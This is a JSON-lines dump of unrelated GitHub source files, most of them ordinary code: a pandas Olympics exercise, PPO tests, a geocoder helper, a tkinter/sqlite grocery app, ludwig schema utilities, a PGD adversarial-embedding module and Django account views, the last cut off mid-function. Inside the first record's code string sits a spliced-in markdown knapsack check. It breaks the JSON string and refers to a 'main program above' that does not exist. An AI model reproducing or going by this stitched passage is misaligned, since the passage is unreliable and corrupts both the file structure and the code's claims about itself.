+{"seq_id":"14413548081","text":"# %load q07_unusual_performances/build.py\n# 
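For the knapsack sample data in the main program above (values `[90, 75, 60, 20, 10]`, weights `[4, 3, 3, 2, 2]`, capacity 6), a brute-force cross-check confirms the optimum that all five implementations should return:

```python
from itertools import combinations

v, w, W = [90, 75, 60, 20, 10], [4, 3, 3, 2, 2], 6
best = max(
    sum(v[i] for i in c)
    for r in range(len(v) + 1)
    for c in combinations(range(len(v)), r)
    if sum(w[i] for i in c) <= W
)
assert best == 135  # items 1 and 2: 75 + 60 with weight 3 + 3 = 6
```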
default imports\nfrom greyatomlib.olympics_project_new.q02_country_operations.build import q02_country_operations, q01_rename_columns\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \nOlympicsDF=q02_country_operations(OlympicsDF)\n\ndef q07_unusual_performances(OlympicsDF,low, high):\n \n \n df =OlympicsDF[:-1]\n #quant_df = df['Total'].quantile([low, high])\n df_low= df[low >= df['Total']]['Country_Name']\n df_high=df[high <= df['Total']]['Country_Name']\n return df_low,df_high\n\n\n\n\n\n\n","repo_name":"nemkothari/olympic_project_new","sub_path":"q07_unusual_performances/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"41922211692","text":"import pytest\n\nimport jax\nimport jax.numpy as jnp\nfrom .. import ppo_main\nimport envpool\n\n\n# parameterize the number of environments\n@pytest.mark.parametrize(\"num_envs\", [1, 2, 4])\ndef test_collect_trajectory_and_store_in_buffer(num_envs):\n train_config = ppo_main.TrainConfig(\n num_envs=num_envs,\n horizon=16\n )\n env = envpool.make(\n \"CartPole-v1\",\n env_type=\"gym\",\n num_envs=train_config.num_envs,\n )\n buffer = ppo_main.Buffer.create(\n horizon=train_config.horizon,\n num_envs=train_config.num_envs,\n observation_shape=(4,)\n )\n state = ppo_main.create_train_state(\n train_config, env.observation_space.shape, env.action_space.n)\n rng = jax.random.PRNGKey(train_config.model_seed)\n collected_buffer = ppo_main.collect_trajectory(\n state, buffer, env, rng, train_config)\n assert collected_buffer.obs.shape == (\n train_config.horizon + 1, train_config.num_envs, 4)\n # assert observations are non-zero and hence replaced\n assert not jnp.allclose(collected_buffer.obs, 0.0)\n\n\n@pytest.mark.parametrize(\"num_envs\", [1, 2, 4])\ndef test_agent_can_learn_from_experience(num_envs):\n train_config = ppo_main.TrainConfig(\n num_envs=num_envs,\n horizon=16\n )\n env = envpool.make(\n \"CartPole-v1\",\n env_type=\"gym\",\n num_envs=train_config.num_envs,\n )\n buffer = ppo_main.Buffer.create(\n horizon=train_config.horizon,\n num_envs=train_config.num_envs,\n observation_shape=(4,)\n )\n state = ppo_main.create_train_state(\n train_config, env.observation_space.shape, env.action_space.n)\n rng = jax.random.PRNGKey(train_config.model_seed)\n\n for _ in range(5):\n state, (loss, actor_loss, critic_loss, entropy_loss) = ppo_main.update_ppo_model(\n state, buffer, train_config, rng)\n\n assert loss < 0.5\n","repo_name":"Sruinard/deep_reinforcement_learning","sub_path":"ppo/tests/test_ppo_main.py","file_name":"test_ppo_main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13031991136","text":"import requests\n\nfrom config import APIKEY\nfrom exceptions import AddressError\n\n\ndef get_object_info(address: str) -> dict:\n geocoder_api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n\n geocoder_params = {\n \"apikey\": APIKEY,\n \"geocode\": address,\n \"format\": \"json\"}\n\n response = requests.get(geocoder_api_server, params=geocoder_params)\n if not response:\n raise AddressError(\"Адрес не найден. Проверьте правильность написания\")\n try:\n return response.json()[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n except IndexError:\n raise AddressError(\"Адрес не найден. 
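The commented-out `quantile` line in the q07 build step above hints at a percentile-based cut; a small self-contained version on toy data (the column names mirror the snippet, the numbers are made up):

```python
import pandas as pd

df = pd.DataFrame({"Country_Name": list("ABCDE"), "Total": [1, 4, 9, 16, 100]})
low, high = df["Total"].quantile([0.1, 0.9])
under_performers = df[df["Total"] <= low]["Country_Name"]
over_performers = df[df["Total"] >= high]["Country_Name"]
assert list(under_performers) == ["A"] and list(over_performers) == ["E"]
```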
Проверьте правильность написания\")\n\n\ndef get_object_coords_region(address: str) -> dict:\n item = get_object_info(address)\n longitude, latitude = item[\"Point\"][\"pos\"].split(\" \")\n try:\n region = item['metaDataProperty']['GeocoderMetaData']['Address']['Components'][2]['name']\n except IndexError:\n raise AddressError(\"Адрес не найден. Проверьте правильность написания\")\n return {\"longitude\": longitude, \"latitude\": latitude, \"region\": region}\n\n\ndef static_map_href(longitude, latitude):\n return f\"http://static-maps.yandex.ru/1.x/?l=map&{longitude},{latitude}&size=400,400&pt={longitude},{latitude},flag&spn=0.002,0.002\"\n","repo_name":"maklybae/MaKsenia","sub_path":"map_tools.py","file_name":"map_tools.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19572021353","text":"import tkinter as tk\r\nfrom tkinter import ttk, messagebox\r\nimport sqlite3\r\nfrom tkinter import *\r\n\r\nconn = sqlite3.connect(\"canteen.db\")\r\ncurr = conn.cursor()\r\ncurr.execute(\r\n 'create table if not exists Grocery(item_name text, quantity integer, price real, date text, total_price real)')\r\n\r\n\r\nclass Grocery(Toplevel):\r\n def __init__(self,username):\r\n Toplevel.__init__(self)\r\n self.title(\"CanMagS\")\r\n self.geometry(\"1200x700+0+0\")\r\n self.resizable(False, False)\r\n self.config(bg='mediumseagreen')\r\n self.count = 0\r\n tk.Label(self, text=\"CanMagS\", fg=\"blue\", bg='mediumseagreen',\r\n font=('Goudy Old Style', 80)).place(x=400, y=5)\r\n\r\n tk.Label(self, text=\"Item name\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=200)\r\n Label(self, text=\"Quantity\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=230)\r\n Label(self, text=\"Price\",\r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=260)\r\n Label(self, text=\"Date\", \r\n fg=\"blue\", bg='mediumseagreen', font=('Arial', 16)).place(x=30, y=290)\r\n self.itn = StringVar()\r\n self.e1 = Entry(self, textvariable=self.itn)\r\n self.e1.place(x=160, y=205)\r\n self.q = StringVar()\r\n self.e2 = Entry(self, textvariable=self.q)\r\n self.e2.place(x=160, y=235)\r\n self.p = StringVar()\r\n self.e3 = Entry(self, textvariable=self.p)\r\n self.e3.place(x=160, y=265)\r\n self.d = StringVar()\r\n self.e4 = Entry(self, textvariable=self.d)\r\n self.e4.place(x=160, y=295)\r\n\r\n Button(self, text=\"Add\", command=self.Add,\r\n height=3, width=13).place(x=600, y=250)\r\n Button(self, text=\"View information\", command=self.view,\r\n height=3, width=13).place(x=710, y=250)\r\n Button(self, text=\"Update\", command=self.update,\r\n height=3, width=13).place(x=820, y=250)\r\n Button(self, text=\"Delete\", command=self.delete,\r\n height=3, width=13).place(x=930, y=250)\r\n \r\n\r\n cols = ('Item Name', 'Quantity', 'Price', 'Date', 'Total Price')\r\n self.listBox = ttk.Treeview(self, columns=cols, show='headings')\r\n\r\n for col in cols:\r\n self.listBox.heading(col, text=col)\r\n self.listBox.column(col, anchor=CENTER)\r\n self.listBox.grid(row=1, column=0, columnspan=2)\r\n self.listBox.place(x=30, y=350)\r\n\r\n self.listBox.bind('', self.GetValue)\r\n self.show()\r\n\r\n def GetValue(self, event):\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n row_id = self.listBox.selection()[0]\r\n select = self.listBox.set(row_id)\r\n self.e1.insert(0, select['item_name'])\r\n self.e2.insert(0, 
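For the Yandex geocoder wrapper above, a compact variant of the same request that surfaces HTTP failures explicitly via `raise_for_status()` instead of the truthiness check on the response object; `apikey` is assumed to come from the same `config` module:

```python
import requests

def geocode(address: str, apikey: str) -> dict:
    params = {"apikey": apikey, "geocode": address, "format": "json"}
    response = requests.get("http://geocode-maps.yandex.ru/1.x/", params=params)
    response.raise_for_status()  # explicit error instead of `if not response`
    return response.json()
```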
select['quantity'])\r\n self.e3.insert(0, select['price'])\r\n self.e4.insert(0, select['date'])\r\n\r\n \r\n def Add(self):\r\n item_name = self.e1.get()\r\n quantity = self.e2.get()\r\n price = self.e3.get()\r\n date = self.e4.get()\r\n self.tp = float(price) * float(quantity)\r\n try:\r\n curr.execute('insert into Grocery values(?,?,?,?,?)',\r\n (item_name, quantity, price, date, self.tp))\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n self.show()\r\n conn.commit()\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n def view(self):\r\n try:\r\n selected = self.listBox.focus()\r\n temp = self.listBox.item(selected, 'values')\r\n temp = list(temp)\r\n self.itn.set(temp[0])\r\n self.e1.config(state='disabled')\r\n self.q.set(temp[1])\r\n self.p.set(temp[2])\r\n self.d.set(temp[3])\r\n\r\n except Exception as e:\r\n\r\n print(e)\r\n\r\n def update(self):\r\n try:\r\n self.tp = float(self.e2.get()) * float(self.e3.get())\r\n curr.execute('update Grocery set quantity = ?, price = ?, date = ?, total_price = ? where item_name = ?',\r\n (self.e2.get(), self.e3.get(), self.e4.get(), self.tp, self.e1.get()))\r\n self.e1.config(state='normal')\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n self.show()\r\n conn.commit()\r\n\r\n except Exception as e:\r\n\r\n print(e)\r\n\r\n def delete(self):\r\n try:\r\n selected = self.listBox.focus()\r\n temp = self.listBox.item(selected, 'values')\r\n temp = list(temp)\r\n curr.execute('DELETE FROM Grocery WHERE item_name=?', (temp[0],))\r\n self.e1.delete(0, END)\r\n self.e2.delete(0, END)\r\n self.e3.delete(0, END)\r\n self.e4.delete(0, END)\r\n self.e1.focus_set()\r\n conn.commit()\r\n for record in selected:\r\n self.listBox.delete(record)\r\n self.show()\r\n\r\n except Exception as e:\r\n print(e)\r\n\r\n def show(self):\r\n for i in self.listBox.get_children():\r\n self.listBox.delete(i)\r\n count = 1\r\n curr.execute(\"SELECT * from Grocery\")\r\n records = curr.fetchall()\r\n for record in records:\r\n self.listBox.insert(parent='', index='end', iid=count, text='', values=(\r\n record[0], record[1], record[2], record[3], record[4]))\r\n count += 1\r\n\r\n ","repo_name":"Shashank-Shetty/Python-Project","sub_path":"grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72143568434","text":"import os\nimport os.path as op\nimport glob\nimport cv2\nimport time\nimport numpy as np\nimport csv\n\nimport mmcv\nfrom mmcv.transforms import Compose\nfrom mmengine.utils import track_iter_progress\nfrom mmdet.registry import VISUALIZERS\nfrom mmdet.apis import init_detector, inference_detector\n\n\nclass SpeedLog:\n def __init__(self, ckpt_list, output, using_video=False):\n self.ckpt_list = ckpt_list\n if using_video:\n self.input_video = mmcv.VideoReader(\"../mmdetection/demo/demo.mp4\")\n self.frames = list(track_iter_progress(self.input_video))\n else:\n self.frames = self.load_frames()\n self.items = None\n self.test_pipeline = None\n self.models = self.build_model()\n self.logging_data(output=output, vis=False)\n\n def build_model(self):\n self.items = {glob.glob(op.join(config, \"*.py\"))[0]: glob.glob(op.join(config, \"*.pth\"))[0] for config in self.ckpt_list}\n models = [init_detector(config, pth) for config, pth in self.items.items()]\n 
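The grocery page above issues `curr.execute(...)` followed by a manual `conn.commit()`; as a hedged aside, sqlite3 connections also work as context managers that commit on success and roll back on error (same table layout as the snippet, sample row made up):

```python
import sqlite3

with sqlite3.connect("canteen.db") as conn:
    conn.execute(
        "INSERT INTO Grocery VALUES (?, ?, ?, ?, ?)",
        ("rice", 2, 45.0, "01-01-2023", 90.0),
    )
# the with-block committed the insert; note the connection itself stays open
```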
self.test_pipeline = [i for i in range(len(models))]\n for i, model in enumerate(models):\n model.cfg.test_dataloader.dataset.pipeline[0].type = 'LoadImageFromNDArray'\n self.test_pipeline[i] = Compose(model.cfg.test_dataloader.dataset.pipeline)\n return models\n\n def load_frames(self): #input = image directory, return image list/ NEED implement\n images = None\n return images\n\n def inf_frame_per_model(self):\n frame_per_model = [[model_name.split('/')[-1].split('.')[0]] for model_name in self.items.keys()]\n for idx in range(len(self.models)):\n for frame in self.frames:\n inf_time = self.check_speed(self.models[idx], frame, idx)\n frame_per_model[idx].append(inf_time)\n return frame_per_model\n\n def inf_model_per_frame(self):\n model_per_frame = [[model_name.split('/')[-1].split('.')[0]] for model_name in self.items.keys()]\n for frame in self.frames:\n for idx in range(len(self.models)):\n inf_time = self.check_speed(self.models[idx], frame, idx)\n model_per_frame[idx].append(inf_time)\n return model_per_frame\n\n def check_speed(self, model, frame, idx):\n start = time.time()\n inference_detector(model, frame, test_pipeline=self.test_pipeline[idx])\n inf_time = time.time() - start\n return inf_time\n\n def logging_data(self, output, vis=False):\n index = np.array([i - 1 for i in range(len(self.frames) + 1)])\n index = index[np.newaxis, :]\n split_bar = np.array(['|' for i in range(len(self.frames) + 1)])\n model_per_frame = np.array(self.inf_model_per_frame())\n frame_per_model = np.array(self.inf_frame_per_model())\n result_table = np.vstack([index, model_per_frame, split_bar[np.newaxis, :], frame_per_model])\n result_table = result_table.T\n self.write_log(output, result_table)\n\n def write_log(self, output, results):\n with open(op.join(output, time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))+\".csv\"), 'w') as f:\n w = csv.writer(f)\n for result in results:\n w.writerow(result)\n\n\nckpt_list = glob.glob(op.join(\"/mnt/intHDD/mmdet_ckpt/test_yolo\", \"*\"))\noutput_path = \"/home/gorilla/lee_ws/optimize_model/optimize_model/speed_log\"\nt = SpeedLog(ckpt_list, output_path, using_video=True)\nprint(\"\")","repo_name":"SsduckK/optimize_model","sub_path":"models_speed_check.py","file_name":"models_speed_check.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31423456575","text":"import heapq\n\n\ndef solution(scoville, K):\n heapq.heapify(scoville)\n cnt = 0\n while True:\n if len(scoville) <= 1 and scoville[0] < K:\n return -1\n\n if scoville[0] >= K:\n return cnt\n\n new = heapq.heappop(scoville) + (heapq.heappop(scoville) * 2)\n heapq.heappush(scoville, new)\n cnt += 1\n\n\nif __name__ == \"__main__\":\n scoville = [1, 2, 3, 9, 10, 12]\n K = 7\n res = solution(scoville, K)\n print(res)\n","repo_name":"jinwooklim/coding-test","sub_path":"programmers/coding_test_kit/heap/heap01.py","file_name":"heap01.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12799927434","text":"import copy\nfrom dataclasses import field\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom marshmallow import fields, ValidationError\n\nfrom ludwig.api_annotations import DeveloperAPI\nfrom ludwig.constants import TYPE\nfrom ludwig.schema import utils as schema_utils\nfrom ludwig.schema.features.augmentation.base import BaseAugmentationConfig\nfrom ludwig.utils.registry import 
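The scoville heap solution above can be traced by hand for the sample input `[1, 2, 3, 9, 10, 12]` with `K = 7`: mixing 1 and 2 gives 1 + 2*2 = 5, mixing 3 and 5 gives 3 + 5*2 = 13, and the minimum is then 9 >= 7, so the answer is 2 mixes:

```python
import heapq

h = [1, 2, 3, 9, 10, 12]
heapq.heapify(h)
mixes = 0
while h[0] < 7:
    heapq.heappush(h, heapq.heappop(h) + heapq.heappop(h) * 2)
    mixes += 1
assert mixes == 2 and h[0] >= 7
```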
Registry\n\n_augmentation_config_registry = Registry()\n\n\n@DeveloperAPI\ndef get_augmentation_config_registry() -> Registry:\n return _augmentation_config_registry\n\n\n@DeveloperAPI\ndef register_augmentation_config(name: str, features: Union[str, List[str]]):\n if isinstance(features, str):\n features = [features]\n\n def wrap(cls):\n for feature in features:\n augmentation_registry = get_augmentation_config_registry().get(feature, {})\n augmentation_registry[name] = cls\n get_augmentation_config_registry()[feature] = augmentation_registry\n return cls\n\n return wrap\n\n\n@DeveloperAPI\ndef get_augmentation_cls(feature: str, name: str):\n return get_augmentation_config_registry()[feature][name]\n\n\n@DeveloperAPI\ndef get_augmentation_classes(feature: str):\n return get_augmentation_config_registry()[feature]\n\n\n@DeveloperAPI\ndef AugmentationDataclassField(\n feature_type: str,\n default: Union[str, BaseAugmentationConfig] = False,\n default_augmentations: Optional[List[BaseAugmentationConfig]] = None,\n description: str = \"\",\n):\n \"\"\"Custom dataclass field that when used inside a dataclass will allow the user to specify an augmentation\n config.\n\n Args:\n default: The default augmentation config to use.\n default_augmentations: The default list of augmentations to use when param value is set to `True`.\n description: The description of the augmentation config.\n\n Returns: Initialized dataclass field that converts a list with params to an augmentation config.\n \"\"\"\n\n default_augmentations = default_augmentations or []\n default_augmentations = [a.to_dict() for a in default_augmentations]\n\n if isinstance(default, bool):\n default = default_augmentations if default else []\n\n class AugmentationContainerMarshmallowField(fields.Field):\n \"\"\"Custom marshmallow field that deserializes a list for a valid augmentation config from the\n augmentation_registry and creates a corresponding JSON schema for external usage.\"\"\"\n\n def _deserialize(self, value, attr, data, **kwargs):\n if isinstance(value, bool):\n value = default_augmentations if value else []\n\n if not isinstance(value, list):\n raise ValidationError(f\"Augmentation config must be a list, found: {type(value)}\")\n\n augmentation_classes = get_augmentation_classes(feature_type)\n augmentation_list = []\n for augmentation in value:\n augmentation_op = augmentation[TYPE]\n if augmentation_op in augmentation_classes:\n augmentation_cls = augmentation_classes[augmentation_op]\n pre = augmentation_cls()\n try:\n augmentation_list.append(pre.Schema().load(augmentation))\n except (TypeError, ValidationError) as error:\n raise ValidationError(\n f\"Invalid augmentation params: {value}, see `{pre}` definition. 
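The `register_augmentation_config` decorator above follows a common registry pattern; a stripped-down, dependency-free sketch of the same idea, with a plain dict standing in for ludwig's `Registry` and a made-up augmentation name:

```python
_registry: dict = {}

def register(name: str):
    def wrap(cls):
        _registry[name] = cls  # record the class under its public name
        return cls
    return wrap

@register("random_rotate")
class RandomRotate:
    pass

assert _registry["random_rotate"] is RandomRotate
```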
Error: {error}\"\n )\n else:\n raise ValidationError(\n f\"Invalid augmentation type: '{augmentation_op}', \"\n f\"expected one of: {list(augmentation_classes.keys())}\"\n )\n return augmentation_list\n\n def _jsonschema_type_mapping(self):\n return get_augmentation_list_jsonschema(feature_type, default)\n\n try:\n assert isinstance(default, list), \"Augmentation config must be a list.\"\n load_augmentation_list = []\n dump_augmentation_list = []\n for augmentation in default:\n augmentation_op = augmentation[TYPE]\n augmentation_cls = get_augmentation_cls(feature_type, augmentation_op)\n pre = augmentation_cls()\n try:\n load_augmentation_list.append(pre.Schema().load(augmentation))\n dump_augmentation_list.append(pre.Schema().dump(augmentation))\n except (TypeError, ValidationError) as error:\n raise ValidationError(f\"Invalid augmentation params: {default}, see `{pre}` definition. Error: {error}\")\n\n load_default = lambda: copy.deepcopy(load_augmentation_list)\n dump_default = dump_augmentation_list\n\n return field(\n metadata={\n \"marshmallow_field\": AugmentationContainerMarshmallowField(\n allow_none=False,\n dump_default=dump_default,\n load_default=load_default,\n )\n },\n default_factory=load_default,\n )\n except Exception as e:\n raise ValidationError(f\"Unsupported augmentation type. See augmentation_registry. \" f\"Details: {e}\")\n\n\n@DeveloperAPI\ndef get_augmentation_list_jsonschema(feature_type: str, default: List[Dict[str, Any]]):\n \"\"\"This function returns a JSON augmentation schema.\n\n Returns: JSON Schema\n \"\"\"\n augmentation_types = sorted(list(get_augmentation_config_registry()[feature_type].keys()))\n schema = {\n \"oneOf\": [\n {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"type\": {\n \"type\": \"string\",\n \"enum\": augmentation_types,\n \"title\": \"type\",\n \"description\": \"Type of augmentation to apply.\",\n },\n },\n \"additionalProperties\": True,\n \"allOf\": get_augmentation_list_conds(feature_type),\n \"required\": [\"type\"],\n },\n \"title\": \"array_option\",\n },\n {\"type\": \"boolean\", \"description\": \"Apply standard augmentation pipeline.\", \"title\": \"boolean_option\"},\n ],\n \"title\": \"augmentation\",\n }\n\n return schema\n\n\n@DeveloperAPI\ndef get_augmentation_list_conds(feature_type: str):\n \"\"\"This function returns a list of if-then JSON clauses for each augmentation type along with their properties\n and constraints.\n\n Returns: List of JSON clauses\n \"\"\"\n conds = []\n for augmentation_op in get_augmentation_classes(feature_type):\n schema_cls = get_augmentation_cls(feature_type, augmentation_op)\n augmentation_schema = schema_utils.unload_jsonschema_from_marshmallow_class(schema_cls)\n augmentation_props = augmentation_schema[\"properties\"]\n schema_utils.remove_duplicate_fields(augmentation_props)\n augmentation_cond = schema_utils.create_cond({\"type\": augmentation_op}, augmentation_props)\n conds.append(augmentation_cond)\n return conds\n","repo_name":"ludwig-ai/ludwig","sub_path":"ludwig/schema/features/augmentation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":10151,"dataset":"github-code","pt":"39"} +{"seq_id":"31848624434","text":"import random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import compute_cl_loss\n\n\nclass PGD(nn.Module):\n r\"\"\"\n PGD in the paper 'Towards Deep Learning Models Resistant to Adversarial 
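The `oneOf` schema assembled above accepts either a list of typed augmentation objects or a bare boolean; a minimal shape check with the `jsonschema` package (assumed to be available), using a cut-down schema in the same spirit:

```python
from jsonschema import validate

schema = {
    "oneOf": [
        {"type": "array", "items": {"type": "object", "required": ["type"]}},
        {"type": "boolean"},
    ]
}
validate(True, schema)                       # boolean form: standard pipeline
validate([{"type": "random_blur"}], schema)  # list form: explicit augmentations
```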
Attacks'\n [https://arxiv.org/abs/1706.06083]\n\n Distance Measure : Linf\n\n Arguments:\n model (nn.Module): model to attack.\n eps (float): maximum perturbation. (Default: 8/255)\n alpha (float): step size. (Default: 2/255)\n steps (int): number of steps. (Default: 10)\n random_start (bool): using random initialization of delta. (Default: True)\n\n Shape:\n - input_tensor: :math:`(N, L, d)`\n - labels: :\n - output: :\n\n Examples::\n\n \"\"\"\n def __init__(self,\n eps=0.08,\n alpha=0.05,\n steps=3,\n ):\n super().__init__()\n self.eps = eps\n self.alpha = alpha\n self.steps = steps\n\n def forward(self, input_embedding, input_tensor_b, model=None):\n r\"\"\"\n\n \"\"\"\n model.eval()\n\n input_embedding = input_embedding.clone().detach()\n input_tensor_b = input_tensor_b.clone().detach()\n adv_inputs = input_embedding.clone().detach()\n\n loss = compute_cl_loss\n for _ in range(self.steps):\n adv_inputs.requires_grad = True\n input_tensor_a_ = model.get_input_representations(inputs_embeds=adv_inputs)\n\n # Calculate loss\n cost = - loss(input_tensor_a_, input_tensor_b)\n\n # Update adversarial samples\n grad = torch.autograd.grad(cost, adv_inputs,\n retain_graph=False, create_graph=False)[0]\n\n adv_inputs = adv_inputs.detach() + self.alpha*grad.sign()\n delta = torch.clamp(adv_inputs - input_embedding, min=-self.eps, max=self.eps)\n adv_inputs = torch.clamp(input_embedding + delta, min=0, max=1).detach()\n\n return adv_inputs\n","repo_name":"Changanyue/bert-downstream-framework","sub_path":"downstream_framework/Simcse-adv/PGD.py","file_name":"PGD.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"39"} +{"seq_id":"6061116905","text":"class Solution:\n \"\"\"\n 剑指 Offer 20. 
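The two `torch.clamp` calls at the end of the PGD loop above implement the Linf projection; a tiny numeric illustration on a single scalar input, assuming a constant +1 gradient sign for the demo:

```python
import torch

x, eps, alpha = torch.tensor([0.5]), 0.08, 0.05
adv = x.clone()
for _ in range(3):
    adv = adv + alpha * torch.ones_like(adv).sign()    # pretend grad.sign() == +1
    adv = x + torch.clamp(adv - x, min=-eps, max=eps)  # keep delta in the eps-ball
    adv = torch.clamp(adv, min=0, max=1)               # keep the input in range
assert torch.isclose(adv - x, torch.tensor([eps])).item()  # saturates at eps
```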
表示数值的字符串\n \"\"\"\n\n def isNumber(self, s: str) -> bool:\n if not s:\n return False\n is_num, is_dot, is_e_or_E = False, False, False\n s = s.strip()\n for i in range(len(s)):\n if '0' <= s[i] <= '9':\n # 判断当前字符是否为 0~9 的数位\n is_num = True\n elif s[i] == '.':\n # 遇到小数点\n if is_dot or is_e_or_E:\n return False\n is_dot = True\n elif s[i] == 'e' or s[i] == 'E':\n if not is_num or is_e_or_E:\n return False\n is_e_or_E = True\n is_num = False\n elif s[i] == '-' or s[i] == '+':\n if i != 0 and s[i - 1] != 'e' and s[i - 1] != 'E':\n return False\n else:\n return False\n return is_num\n\n\nif __name__ == '__main__':\n s = Solution()\n valid_sample = [\"+100\", \"5e2\", \"-123\", \"3.1416\", \"-1E-16\", \"0123\"]\n for sample in valid_sample:\n print(s.isNumber(sample))\n invalid_sample = [\"12e\", \"1a3.14\", \"1.2.3\", \"+-5\", \"12e+5.4\"]\n for sample in invalid_sample:\n print(s.isNumber(sample))\n","repo_name":"joizhang/leetcode-python","sub_path":"lcof/string/Offer_20.py","file_name":"Offer_20.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34106634582","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import RegistrationForm, LoginForm, AccountUpdateForm\nfrom .models import Account\n\nfrom friends.models import FriendRequest, FriendList\nfrom utils.search import binary_search\n\n\ndef register_view(request):\n \"\"\"View to register new user\"\"\"\n if request.user.is_authenticated:\n return HttpResponse(\n f\"You are already authenticated with {request.user.email}\"\n )\n if request.method == \"POST\":\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n account = authenticate(email=form.cleaned_data[\"email\"].lower(),\n password=form.cleaned_data[\"password1\"])\n if account.is_active:\n login(request, account)\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"home\")\n else:\n form = RegistrationForm()\n return render(request, \"account/register.html\",\n {\"registration_form\": form})\n\n\ndef logout_view(request):\n \"\"\"Log out user out of the website\"\"\"\n logout(request)\n return redirect(\"home\")\n\n\ndef login_view(request):\n \"\"\"Login view to authenticate the user using email and password\"\"\"\n if request.user.is_authenticated:\n return redirect(\"home\")\n\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n user = authenticate(email=form.cleaned_data[\"email\"],\n password=form.cleaned_data[\"password\"])\n if user:\n if user.is_active:\n login(request, user)\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"home\")\n else:\n form.add_error(None, \"User account is not active.\")\n else:\n form.add_error(None, \"User not found with above credentials\")\n else:\n form = LoginForm()\n return render(request, \"account/login.html\", {\"login_form\": form})\n\n\ndef account_view(request, username):\n \"\"\"View to show details of user account\"\"\"\n try:\n account = Account.objects.get(username=username)\n except Account.DoesNotExist:\n return HttpResponseNotFound(\"The user doesn't exist.\")\n else:\n request_user = request.user\n is_friend, 
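The flag-based scan above can be cross-checked against a single regular expression; this is a hedged equivalent (not part of the original file) that agrees with the valid/invalid samples in the `__main__` block:

```python
import re

NUM_RE = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")

valid = ["+100", "5e2", "-123", "3.1416", "-1E-16", "0123"]
invalid = ["12e", "1a3.14", "1.2.3", "+-5", "12e+5.4"]
assert all(NUM_RE.match(s.strip()) for s in valid)
assert not any(NUM_RE.match(s.strip()) for s in invalid)
```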
request_status, friend_requests = False, None, None\n pending_friend_request_id = None\n\n # Check if client-user is logged-in and is seeing self account\n is_self = request_user.is_authenticated and request_user == account\n\n if request_user.is_authenticated and not is_self:\n # Check if client user is friend with account opened\n is_friend = request_user.friend_list.is_friend(account)\n if not is_friend:\n # Check if friend request has been sent by any of them\n friend_request: FriendRequest = FriendRequest.objects.filter(\n Q(sender=request_user, receiver=account) |\n Q(sender=account, receiver=request_user),\n is_active=True\n ).last()\n if friend_request:\n # Check if request is sent by sign-in user to other account\n if friend_request.sender == request_user and \\\n friend_request.receiver == account:\n request_status = \"SENT\"\n # Check if request is received by sign-in user from other\n # account\n elif friend_request.sender == account and \\\n friend_request.receiver == request_user:\n request_status = \"RECEIVED\"\n pending_friend_request_id = friend_request.pk\n elif is_self:\n friend_requests = FriendRequest.objects.filter(\n receiver=request_user, is_active=True\n ).count()\n ctx = {\n \"account\": account,\n \"is_self\": is_self,\n \"is_friend\": is_friend,\n \"request_status\": request_status,\n \"friends_count\": account.friends.count(),\n \"friend_requests\": friend_requests,\n \"pending_friend_request_id\": pending_friend_request_id\n }\n return render(request, \"account/account.html\", ctx)\n\n\ndef account_search_view(request):\n \"\"\"View to search accounts\"\"\"\n\n ctx = {}\n search_query = request.GET.get(\"q\")\n if len(search_query) > 0:\n search_results = Account.objects.filter(\n Q(email__icontains=search_query) |\n Q(username__icontains=search_query)\n ).only(\"id\", \"email\", \"username\", \"profile_image\").distinct()\n\n # [(account1: Account, friendship_status_with_me: bool), ...]\n if request.user.is_authenticated:\n my_friends = tuple(\n FriendList.objects.get(user=request.user).friends\n .order_by(\"pk\").values_list(\"pk\", flat=True)\n )\n 